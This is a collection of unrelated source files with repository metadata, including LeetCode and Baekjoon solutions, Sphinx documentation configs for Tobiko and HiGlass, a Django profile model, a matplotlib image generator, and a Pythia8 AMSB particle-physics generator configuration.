            MediacatVMConfigurator.__createHVMFileHdConfigFile(vm,env)
        else:
            raise Exception("type of file or type of virtualization not supported for the creation of xen vm configuration file")
|
[
"jenkins@integration.localhost"
] |
jenkins@integration.localhost
|
f5bd5d0daea26ef86acd064dbec79ff7205d9815
|
10b5a703c0166b55331513d2a9aead687032e804
|
/leetcode1578.py
|
7f4f21ed382eed47d291365b4de17dc2a0e596ab
|
[] |
no_license
|
jack456054/leetcode
|
f2d623d5683098b2038322ee3eef81dc020f6fb1
|
24f0075909f8620513f6f21c9ad3dc299dee8967
|
refs/heads/master
| 2022-11-12T18:01:52.832206
| 2022-11-10T07:24:39
| 2022-11-10T07:24:39
| 125,793,890
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,450
|
py
|
class Solution:
    """LeetCode 1578: Minimum Time to Make Rope Colorful."""

    def minCost(self, colors: str, neededTime: list[int]) -> int:
        """Return the minimum total time to remove balloons so that no two
        consecutive balloons share a color.

        Greedy single pass: within every run of equal colors, all balloons
        except the most expensive one must be removed, so we add each
        balloon's cost and refund the run's maximum at every color change.

        Note: the annotation uses the builtin generic ``list[int]`` instead
        of ``typing.List`` — the original referenced ``List`` without
        importing it, which raises NameError outside the LeetCode sandbox.
        (An earlier heap-based draft was removed as dead code.)
        """
        if len(colors) == 1:
            return 0
        current_color: str = colors[0]
        current_largest: int = neededTime[0]
        results: int = neededTime[0]
        for index, color in enumerate(colors[1:]):
            results += neededTime[index + 1]
            if current_color == color:
                # Same run: track the priciest balloon seen so far.
                current_largest = max(current_largest, neededTime[index + 1])
            else:
                # Color changed: keep (refund) the priciest balloon of the
                # run that just ended and start a new run.
                results -= current_largest
                current_color = color
                current_largest = neededTime[index + 1]
        # Refund the priciest balloon of the final run.
        results -= current_largest
        return results
|
[
"jack456054@hotmail.com"
] |
jack456054@hotmail.com
|
e2a991b355677ee0a574dce0a2c19d1b6cac5bc7
|
2256a61b57eed52ce5b3dd19e54108545e3fa1a1
|
/sandbox/ipython/mydemo.py
|
fd31887d834e800fcd42827f23ebcf608aea26b6
|
[
"Apache-2.0"
] |
permissive
|
hubitor/progs
|
18877b7dbd455f1192c96ebe1905f67329d1c749
|
e4537da6da47d380a1a1a04e8068866013c7b7b6
|
refs/heads/master
| 2020-04-28T18:49:23.446076
| 2019-02-18T07:59:28
| 2019-02-18T07:59:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
#! /usr/bin/env python
# -*- coding: latin-1 -*-
from IPython.lib.demo import Demo

# Wrap myscript.py as an interactive IPython demo; calling mydemo() steps
# through the script section by section.  myscript.py must exist in the
# current working directory.
mydemo = Demo('myscript.py')
#mydemo()
|
[
"romain.boman@gmail.com"
] |
romain.boman@gmail.com
|
1f87942cf0798f90d596f602e6524b16e1aed34a
|
df4b577668b830fcb41be675d691a72b952e892b
|
/releasenotes/source/conf.py
|
9550aff663dfded18ef4e450b36cecf4ea41502c
|
[
"Apache-2.0"
] |
permissive
|
4383/tobiko
|
37ef7bfb3b51918825c4c412136467fb32850494
|
f8e6916db890021fa17ddbfc5e6007a25093c8cb
|
refs/heads/master
| 2020-10-01T00:03:27.723538
| 2019-12-11T16:01:53
| 2019-12-11T16:04:14
| 227,405,383
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,970
|
py
|
# Copyright 2019 Red Hat
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
TOBIKO_DIR = os.path.abspath(os.path.join(BASE_DIR, "..", ".."))
# Make the in-tree tobiko package importable before the `from tobiko import
# version` below, regardless of where sphinx-build is invoked from.
sys.path.insert(0, TOBIKO_DIR)

# -- Project information -----------------------------------------------------
project = 'Tobiko Release Notes'
copyright = "2019, Red Hat"
author = "Tobiko's Team"

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# Version info
from tobiko import version
release = version.release
# The short X.Y version.
# NOTE: this rebinds the name `version` from the imported module to a plain
# string; the module object is not referenced again afterwards.
version = version.version

# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    'reno.sphinxext',
]

# Add any paths that contain templates here, relative to this directory.
templates_path = []

# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'

# The master toctree document.
master_doc = 'index'

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = []

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"

# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
    "canonical_url": "https://docs.openstack.org/tobiko/latest/",
    "logo_only": False,
    "display_version": True,
    "prev_next_buttons_location": "top",
    "style_external_links": True,
    # Toc options
    "collapse_navigation": True,
    "sticky_navigation": True,
    "navigation_depth": 4,
    "includehidden": True,
    "titles_only": False,
}

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}

# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'TobikoReleaseNotesdoc'

# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    #
    # 'papersize': 'letterpaper',

    # The font size ('10pt', '11pt' or '12pt').
    #
    # 'pointsize': '10pt',

    # Additional stuff for the LaTeX preamble.
    #
    # 'preamble': '',

    # Latex figure (float) alignment
    #
    # 'figure_align': 'htbp',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
    (master_doc, 'TobikoReleaseNotes.tex', u'Tobiko Release Notes Documentation',
     u'Tobiko developers', 'manual'),
]

# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    (master_doc, 'tobikoreleasenotes', u'Tobiko Release Notes Documentation',
     [u'Tobiko developers'], 1)
]

# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
    (master_doc, 'TobikoReleaseNotes', u'Tobiko Release Notes Documentation',
     u'Tobiko developers', 'TobikoReleaseNotes', 'One line description of project.',
     'Miscellaneous'),
]
|
[
"fressi@redhat.com"
] |
fressi@redhat.com
|
cfbde29af5c7d47388410751eaebd45c382e38a4
|
ff3f4b3117847f70fe68741288f28576fe2cc5e3
|
/baekjoon/1712_손익분기점.py
|
7ad98c5c1bd7ff74104ee79698dc45bd51b98083
|
[] |
no_license
|
manuck/myAlgo
|
087bbe99672c40762759e9202fe371c394736fb1
|
c673687d23a2d5cc06b6a6d5fb1bc0cb2e2b7bd9
|
refs/heads/master
| 2021-07-01T00:13:27.590848
| 2020-12-17T18:10:16
| 2020-12-17T18:10:16
| 203,954,477
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,280
|
py
|
import sys


def break_even_point(fixed_cost, unit_cost, unit_price):
    """Return the first sales count at which total revenue exceeds total cost.

    Baekjoon 1712: total cost for n units is fixed_cost + unit_cost * n and
    revenue is unit_price * n.  The break-even point is the smallest n with
    unit_price * n > fixed_cost + unit_cost * n.

    :param fixed_cost: fixed cost A (rent, taxes, salaries, ...)
    :param unit_cost: variable cost B per unit produced
    :param unit_price: sale price C per unit
    :returns: smallest profitable unit count, or -1 if profit is impossible
              (i.e. the sale price does not exceed the per-unit cost)
    """
    if unit_cost >= unit_price:
        # Each sale loses (or breaks even on) money, so the fixed cost can
        # never be recovered.
        return -1
    # fixed_cost // margin units recoup the fixed cost; one more unit tips
    # the balance into profit.
    return fixed_cost // (unit_price - unit_cost) + 1


if __name__ == '__main__':
    # Redirect stdin to the sample-input file only when run as a script, so
    # importing this module has no side effects.
    sys.stdin = open('1712_input.txt')
    a, b, c = map(int, input().split())
    # NOTE: the original also printed the inputs (debug leftover), which would
    # be judged as wrong output; only the answer is printed now.
    print(break_even_point(a, b, c))
|
[
"snc9000@naver.com"
] |
snc9000@naver.com
|
fe6f9e517fa57fa574ad57811ee18bab68c95b8d
|
1243d11e36e61542693fb9a4b187f328aa2eb473
|
/account/models.py
|
6d5ebea9fe2dd56a1a41c1d14b7e00f2ff50f127
|
[] |
no_license
|
LatorreDev/Django-socialNetwork
|
344fa7d4fdee2a136695cdf9be20feaa8a8e8094
|
b15f7a3c13e118d3ce1144784357b44f81c426ac
|
refs/heads/master
| 2022-12-08T23:02:43.221239
| 2020-09-18T01:05:03
| 2020-09-18T01:05:03
| 296,475,039
| 0
| 0
| null | 2020-09-18T01:05:04
| 2020-09-18T00:44:37
| null |
UTF-8
|
Python
| false
| false
| 476
|
py
|
from django.db import models
from django.conf import settings
# Create your models here.
class Profile(models.Model):
    """Per-user profile data, linked one-to-one to the configured auth user model."""
    # Deleting the user cascades and deletes this profile row as well.
    user = models.OneToOneField(settings.AUTH_USER_MODEL,
                                on_delete=models.CASCADE)
    # Optional: may be blank in forms and NULL in the database.
    date_of_birth = models.DateField(blank=True, null=True)
    # Optional avatar; files are stored under MEDIA_ROOT/users/<Y>/<m>/<d>/.
    photo = models.ImageField(upload_to='users/%Y/%m/%d',
                              blank=True)

    def __str__(self):
        return f'Profile for user {self.user.username}'
|
[
"niljordan23@gmail.com"
] |
niljordan23@gmail.com
|
0f85e629918d9c10d47d0f02fe53bdb4da9e6d75
|
328ebfdbcef076ce0e930715f9bd786d7498185b
|
/lang/python/learn-python-programming-masterclass/section-3/strings.py
|
91b26393876205c803ac842e2289ac95f64a1bc6
|
[] |
no_license
|
pnowak2/learnjs
|
b618e6f9563b3e86be0b1a21d647698e289daec0
|
f8842b4e9e5d2eae6fb4e0d663b6699d74c90e9c
|
refs/heads/master
| 2023-08-30T05:04:00.227920
| 2023-08-18T10:58:24
| 2023-08-18T10:58:24
| 41,912,571
| 3
| 0
| null | 2023-03-31T06:58:40
| 2015-09-04T11:36:13
|
Python
|
UTF-8
|
Python
| false
| false
| 467
|
py
|
# String basics demo (course exercise): printing, quoting, concatenation
# and simple type inspection.  Every print below is deliberate output.
print("Today is a good day")
print('Python is fun')
print("Python's string are easy to use")
print('We can include "quotes" in string')
print("Hello" + " world")
greeting = "Hello, "
# name = input("Please \n enter your name ")
name = "Tim"
# if we want a space, we can add that too
print(greeting + name)
print(greeting + ' ' + name)
age = 24
print(age)
print(type(greeting))  # <class 'str'>
print(type(age))       # <class 'int'>
age_in_words = "2 years"
# NOTE(review): this prints type(age) again rather than type(age_in_words) —
# looks like a copy-paste slip; confirm intent before changing the output.
print(type(age))
print(f'hello {age}')
|
[
"p.nowak2@gmail.com"
] |
p.nowak2@gmail.com
|
41861453f09818f9a2f62d37ff76df50af693824
|
c5a1c95e9d8ce937f71caf8340cf11fe98e64f56
|
/day15/problem2/[노태윤]소수 찾기.py
|
8b5fff7359c78175d22f73d43ea64b2a1a1acb6b
|
[] |
no_license
|
Boot-Camp-Coding-Test/Programmers
|
963e5ceeaa331d99fbc7465f7b129bd68e96eae3
|
83a4b62ba2268a47859a6ce88ae1819bc96dcd85
|
refs/heads/main
| 2023-05-23T08:21:57.398594
| 2021-06-12T16:39:21
| 2021-06-12T16:39:21
| 366,589,317
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,037
|
py
|
from itertools import permutations
def isprime(N):
    """Return True if N is a prime number, False otherwise.

    Trial division up to sqrt(N): if N has any divisor, it has one no larger
    than its square root, so checking i*i <= N suffices.  This replaces the
    original O(N) scan with O(sqrt(N)) while returning identical results —
    relevant here because the caller tests up to 7-digit candidates.

    :param N: integer to test
    """
    if N <= 1:
        return False  # 0, 1 and negatives are not prime
    i = 2
    while i * i <= N:
        if N % i == 0:
            return False  # found a proper divisor
        i += 1
    return True
def solution(numbers):
    """Count the distinct primes formable from digit permutations of *numbers*.

    Every permutation of every non-empty subset of the digit string is joined
    into an integer; duplicates collapse via a set and the primes among the
    remaining candidates are counted.

    :param numbers: string of digits, e.g. "17"
    :returns: number of distinct primes
    """
    def _is_prime(value):
        # Trial division, mirroring the module-level isprime() behaviour.
        if value <= 1:
            return False
        for divisor in range(2, value):
            if value % divisor == 0:
                return False
        return True

    candidates = set()
    for length in range(1, len(numbers) + 1):
        for combo in permutations(numbers, length):
            candidates.add(int("".join(combo)))
    return sum(1 for value in candidates if _is_prime(value))
|
[
"noreply@github.com"
] |
Boot-Camp-Coding-Test.noreply@github.com
|
a52be8922affd67547e135f801c5f101f05b49af
|
60b2738284ae25231da1b1d91e3b61008c548673
|
/ImageGenerator/generate_image_with_index.py
|
0c4caf197fe57011c8892e239f78338ba67557a7
|
[] |
no_license
|
BhallaLab/Scripts
|
f54eb06693ae0f9de3b41a8ed2adda1da930aa24
|
a5d3a2be92b269590316403b3c6194db020b261a
|
refs/heads/master
| 2021-06-02T21:43:13.374239
| 2019-08-06T05:53:03
| 2019-08-06T05:53:03
| 37,115,228
| 8
| 7
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,025
|
py
|
#!/usr/bin/env python

"""generate_image_with_index.py:

    Generates transparent image with numbers written on them. Can be used to
    caliberate projectors for frame per seconds.

"""

__author__           = "Dilawar Singh"
__copyright__        = "Copyright 2015, Dilawar Singh and NCBS Bangalore"
__credits__          = ["NCBS Bangalore"]
__license__          = "GNU GPL"
__version__          = "1.0.0"
__maintainer__       = "Dilawar Singh"
__email__            = "dilawars@ncbs.res.in"
__status__           = "Development"

import matplotlib.pyplot as plt
import os
import sys

fontsize = 100
dpi = 96
# Target a 1024x768 canvas: figsize is in inches, so divide pixels by dpi.
height = 768.0 / dpi
width = 1024.0 / dpi

if not os.path.exists('_images'):
    os.makedirs('_images')

for i in range(1000):
    print("Creating image for %s" % i)
    fig = plt.figure(figsize=(width, height))
    plt.axis('off')
    plt.plot()
    # Draw the frame index roughly centred on the otherwise empty canvas.
    plt.figtext(0.4, 0.4, '%s' % i, fontsize=fontsize)
    plt.savefig('_images/%s.png' % i, dpi=dpi, transparent=True)
    # Bug fix: the original never closed its figures, so all 1000 stayed in
    # memory (matplotlib warns after ~20 open figures and memory grows
    # unboundedly).  Close each figure once it has been saved.
    plt.close(fig)

print("[INFO] All images are saved to _images")
|
[
"dilawars@ncbs.res.in"
] |
dilawars@ncbs.res.in
|
2d583075790cb83484032d009a3e8cfe584193d0
|
70e970ce9ec131449b0888388f65f0bb55f098cd
|
/SignalMC/python/pythia8/AMSB_gluinoToChargino_M-1300GeV_M-900GeV_CTau-10cm_TuneCP5_13TeV_pythia8_cff.py
|
adb04714d2ed3a9d54092513fa5a34287cf407ba
|
[] |
no_license
|
OSU-CMS/DisappTrks
|
53b790cc05cc8fe3a9f7fbd097284c5663e1421d
|
1d1c076863a9f8dbd3f0c077d5821a8333fc5196
|
refs/heads/master
| 2023-09-03T15:10:16.269126
| 2023-05-25T18:37:40
| 2023-05-25T18:37:40
| 13,272,469
| 5
| 12
| null | 2023-09-13T12:15:49
| 2013-10-02T13:58:51
|
Python
|
UTF-8
|
Python
| false
| false
| 8,096
|
py
|
COM_ENERGY = 13000.
MGLU = 1300 # GeV
MCHI = 900 # GeV
CTAU = 100 # mm
CROSS_SECTION = 0.0522 # pb
SLHA_TABLE="""
# ISAJET SUSY parameters in SUSY Les Houches Accord 2 format
# Created by ISALHA 2.0 Last revision: C. Balazs 21 Apr 2009
Block SPINFO # Program information
1 ISASUGRA from ISAJET # Spectrum Calculator
2 7.80 29-OCT-2009 12:50:36 # Version number
Block MODSEL # Model selection
1 3 # Minimal anomaly mediated (AMSB) model
Block SMINPUTS # Standard Model inputs
1 1.27836258E+02 # alpha_em^(-1)
2 1.16570000E-05 # G_Fermi
3 1.17200002E-01 # alpha_s(M_Z)
4 9.11699982E+01 # m_{Z}(pole)
5 4.19999981E+00 # m_{b}(m_{b})
6 1.73070007E+02 # m_{top}(pole)
7 1.77699995E+00 # m_{tau}(pole)
Block MINPAR # SUSY breaking input parameters
1 1.50000000E+03 # m_0
2 3.20160000E+05 # m_{3/2}
3 5.00000000E+00 # tan(beta)
4 1.00000000E+00 # sign(mu)
Block EXTPAR # Non-universal SUSY breaking parameters
0 9.63624875E+15 # Input scale
Block MASS # Scalar and gaugino mass spectrum
# PDG code mass particle
24 8.04229965E+01 # W^+
25 1.17885536E+02 # h^0
35 5.14209375E+03 # H^0
36 5.10833789E+03 # A^0
37 5.12604248E+03 # H^+
1000001 5.84499561E+03 # dnl
1000002 5.84445264E+03 # upl
1000003 5.84499561E+03 # stl
1000004 5.84445264E+03 # chl
1000005 5.11084131E+03 # b1
1000006 4.26797754E+03 # t1
1000011 8.44497009E+02 # el-
1000012 7.82294617E+02 # nuel
1000013 8.44497009E+02 # mul-
1000014 7.82294617E+02 # numl
1000015 4.59390961E+02 # tau1
1000016 7.43124634E+02 # nutl
1000021 %.9g # glss
1000022 8.99857849E+02 # z1ss
1000023 2.96498828E+03 # z2ss
1000024 9.00032288E+02 # w1ss
1000025 -4.94443994E+03 # z3ss
1000035 4.94548633E+03 # z4ss
1000037 4.95200684E+03 # w2ss
2000001 5.94409229E+03 # dnr
2000002 5.88074072E+03 # upr
2000003 5.94409229E+03 # str
2000004 5.88074072E+03 # chr
2000005 5.89824365E+03 # b2
2000006 5.15734326E+03 # t2
2000011 4.41901886E+02 # er-
2000013 4.41901886E+02 # mur-
2000015 7.75092834E+02 # tau2
Block ALPHA # Effective Higgs mixing parameter
-1.97571859E-01 # alpha
Block STOPMIX # stop mixing matrix
1 1 6.91948459E-02 # O_{11}
1 2 -9.97603178E-01 # O_{12}
2 1 9.97603178E-01 # O_{21}
2 2 6.91948459E-02 # O_{22}
Block SBOTMIX # sbottom mixing matrix
1 1 9.99987841E-01 # O_{11}
1 2 4.92899446E-03 # O_{12}
2 1 -4.92899446E-03 # O_{21}
2 2 9.99987841E-01 # O_{22}
Block STAUMIX # stau mixing matrix
1 1 9.16852951E-02 # O_{11}
1 2 9.95788038E-01 # O_{12}
2 1 -9.95788038E-01 # O_{21}
2 2 9.16852951E-02 # O_{22}
Block NMIX # neutralino mixing matrix
1 1 -7.91596598E-04 #
1 2 9.99869168E-01 #
1 3 -1.56042408E-02 #
1 4 4.20085900E-03 #
2 1 9.99881387E-01 #
2 2 1.02774356E-03 #
2 3 1.28675103E-02 #
2 4 -8.40762258E-03 #
3 1 -3.16098332E-03 #
3 2 8.06056987E-03 #
3 3 7.07025349E-01 #
3 4 7.07135558E-01 #
4 1 1.50564853E-02 #
4 2 -1.39906351E-02 #
4 3 -7.06899285E-01 #
4 4 7.07015812E-01 #
Block UMIX # chargino U mixing matrix
1 1 -9.99734461E-01 # U_{11}
1 2 2.30428278E-02 # U_{12}
2 1 -2.30428278E-02 # U_{21}
2 2 -9.99734461E-01 # U_{22}
Block VMIX # chargino V mixing matrix
1 1 -9.99961317E-01 # V_{11}
1 2 8.79876781E-03 # V_{12}
2 1 -8.79876781E-03 # V_{21}
2 2 -9.99961317E-01 # V_{22}
Block GAUGE Q= 4.47923682E+03 #
1 3.57524991E-01 # g`
2 6.52378619E-01 # g_2
3 1.21928000E+00 # g_3
Block YU Q= 4.47923682E+03 #
3 3 8.32892656E-01 # y_t
Block YD Q= 4.47923682E+03 #
3 3 6.45801947E-02 # y_b
Block YE Q= 4.47923682E+03 #
3 3 5.14558963E-02 # y_tau
Block HMIX Q= 4.47923682E+03 # Higgs mixing parameters
1 4.95111182E+03 # mu(Q)
2 5.00000000E+00 # tan(beta)(M_GUT)
3 2.51892105E+02 # Higgs vev at Q
4 2.60951160E+07 # m_A^2(Q)
Block MSOFT Q= 4.47923682E+03 # DRbar SUSY breaking parameters
1 3.00553760E+03 # M_1(Q)
2 8.59459534E+02 # M_2(Q)
3 -5.73397852E+03 # M_3(Q)
31 7.99010315E+02 # MeL(Q)
32 7.99010315E+02 # MmuL(Q)
33 7.61961365E+02 # MtauL(Q)
34 5.51579651E+02 # MeR(Q)
35 5.51579651E+02 # MmuR(Q)
36 3.78081726E+02 # MtauR(Q)
41 5.55658252E+03 # MqL1(Q)
42 5.55658252E+03 # MqL2(Q)
43 4.88496289E+03 # MqL3(Q)
44 5.59192773E+03 # MuR(Q)
45 5.59192773E+03 # McR(Q)
46 4.10720898E+03 # MtR(Q)
47 5.65382471E+03 # MdR(Q)
48 5.65382471E+03 # MsR(Q)
49 5.68008496E+03 # MbR(Q)
Block AU Q= 4.47923682E+03 #
1 1 4.93593066E+03 # A_u
2 2 4.93593066E+03 # A_c
3 3 4.93593066E+03 # A_t
Block AD Q= 4.47923682E+03 #
1 1 1.17858047E+04 # A_d
2 2 1.17858047E+04 # A_s
3 3 1.17858047E+04 # A_b
Block AE Q= 4.47923682E+03 #
1 1 3.34377515E+03 # A_e
2 2 3.34377515E+03 # A_mu
3 3 3.34377515E+03 # A_tau
#
#
#
# =================
# |The decay table|
# =================
#
# PDG Width
DECAY 1000021 5.50675438E+00 # gluino decay
# BR NDA ID1 ID2 ID3
2.50000000E-01 3 1 -1 1000022
2.50000000E-01 3 2 -2 1000022
2.50000000E-01 3 1 -2 1000024
2.50000000E-01 3 -1 2 -1000024
#
# PDG Width
DECAY 1000024 %.9g # chargino decay
#
""" % (MGLU, (1.97326979e-13 / CTAU))
import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.MCTunes2017.PythiaCP5Settings_cfi import *
# Pythia8 generator filter: gluino pair production using the inline SLHA
# spectrum defined above; the chargino is forced to the disappearing-track
# decay chargino -> neutralino + pi+ with proper lifetime CTAU.
generator = cms.EDFilter("Pythia8GeneratorFilter",
    pythiaPylistVerbosity = cms.untracked.int32(0),
    filterEfficiency = cms.untracked.double(-1),
    pythiaHepMCVerbosity = cms.untracked.bool(False),
    # Spectrum and decay table are passed inline instead of via a file.
    SLHATableForPythia8 = cms.string('%s' % SLHA_TABLE),
    comEnergy = cms.double(COM_ENERGY),
    crossSection = cms.untracked.double(CROSS_SECTION),
    maxEventsToPrint = cms.untracked.int32(0),
    PythiaParameters = cms.PSet(
        pythia8CommonSettingsBlock,
        pythia8CP5SettingsBlock,
        processParameters = cms.vstring(
            'SUSY:all = off',
            # Enable only gluino pair production channels.
            'SUSY:gg2gluinogluino = on',
            'SUSY:qqbar2gluinogluino = on',
            '1000024:isResonance = false',
            # Single decay channel: chargino -> neutralino (1000022) + pi+ (211).
            '1000024:oneChannel = 1 1.0 100 1000022 211',
            # Proper lifetime in mm (CTAU is defined in mm above).
            '1000024:tau0 = %.1f' % CTAU,
            'ParticleDecays:tau0Max = %.1f' % (CTAU * 10),
        ),
        parameterSets = cms.vstring(
            'pythia8CommonSettings',
            'pythia8CP5Settings',
            'processParameters')
    ),
    # The following parameters are required by Exotica_HSCP_SIM_cfi:
    slhaFile = cms.untracked.string(''),   # value not used
    processFile = cms.untracked.string('SimG4Core/CustomPhysics/data/RhadronProcessList.txt'),
    useregge = cms.bool(False),
    hscpFlavor = cms.untracked.string('stau'),
    massPoint = cms.untracked.int32(MCHI), # value not used
    particleFile = cms.untracked.string('Configuration/GenProduction/python/ThirteenTeV/DisappTrksAMSBCascade/test/geant4_AMSB_chargino_%sGeV_ctau%scm.slha' % (MCHI, CTAU/10))
)

ProductionFilterSequence = cms.Sequence(generator)
|
[
"ahart@cern.ch"
] |
ahart@cern.ch
|
758ddeec7b172f7f1236be16322795bec7ad6325
|
e7263026bd4f34bae664c37e57a299ce83c7f111
|
/03-Spider/scrapy-spider/xiciIPSpider/xiciIPSpider/items.py
|
06d00e44d6c499c8beabdb1eace42bc540d723ca
|
[] |
no_license
|
Aries000004/grocery
|
34d0ad0648c6dff5c36f4a68abf9eeac59da214d
|
27492f4ac7ef66d544f853dd6686920bcb9dc663
|
refs/heads/master
| 2020-03-24T22:50:37.703257
| 2018-07-26T11:43:54
| 2018-07-26T11:43:54
| 143,105,389
| 1
| 0
| null | 2018-08-01T04:51:12
| 2018-08-01T04:51:12
| null |
UTF-8
|
Python
| false
| false
| 292
|
py
|
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class XiciipspiderItem(scrapy.Item):
    """Item container for data scraped by the xici proxy-IP spider.

    No fields are declared yet; add ``scrapy.Field()`` attributes as needed.
    """
    # define the fields for your item here like:
    # name = scrapy.Field()
    pass
|
[
"1367000465@qq.com"
] |
1367000465@qq.com
|
0bb427439c4a8a56d195361c85fb14868b964517
|
f508e4a751d3dfadd268794fd6092b3781a74d4c
|
/docs/conf.py
|
090e77a6ac8479a9a127eddbd3cf278fac9292ef
|
[
"MIT"
] |
permissive
|
mildewey/higlass
|
c2e274e0bdafccbfe5e994b8992248ae806e82fd
|
8cc135017500216cb24b98c3c82d85ca861081b1
|
refs/heads/master
| 2020-04-02T19:26:31.670874
| 2018-10-19T16:05:30
| 2018-10-19T16:05:30
| 154,734,076
| 0
| 0
| null | 2018-10-25T20:34:59
| 2018-10-25T20:34:59
| null |
UTF-8
|
Python
| false
| false
| 5,306
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# higlass documentation build configuration file, created by
# sphinx-quickstart on Mon Jul 3 16:40:45 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.viewcode', 'sphinx.ext.imgmath', 'sphinx.ext.todo']

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = 'HiGlass'
copyright = '2017,2018 HiGlass Authors'
author = 'HiGlass Authors'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = 'v1.0'
# The full version, including alpha/beta/rc tags.
release = 'v1.0'

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False

# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
# Custom theme shipped in this docs directory (hence html_theme_path = ["."]).
html_theme = 'higlass_theme'
html_theme_path= ["."]

# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
    "sidebar_collapse": False
}

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# This is required for the alabaster theme
# refs: http://alabaster.readthedocs.io/en/latest/installation.html#sidebars
html_sidebars = {
    '**': [
        'about.html',
        'navigation.html',
        'relations.html',  # needs 'show_related': True theme option to display
        'searchbox.html',
        'donate.html',
    ]
}

# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'higlassdoc'

# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    #
    # 'papersize': 'letterpaper',

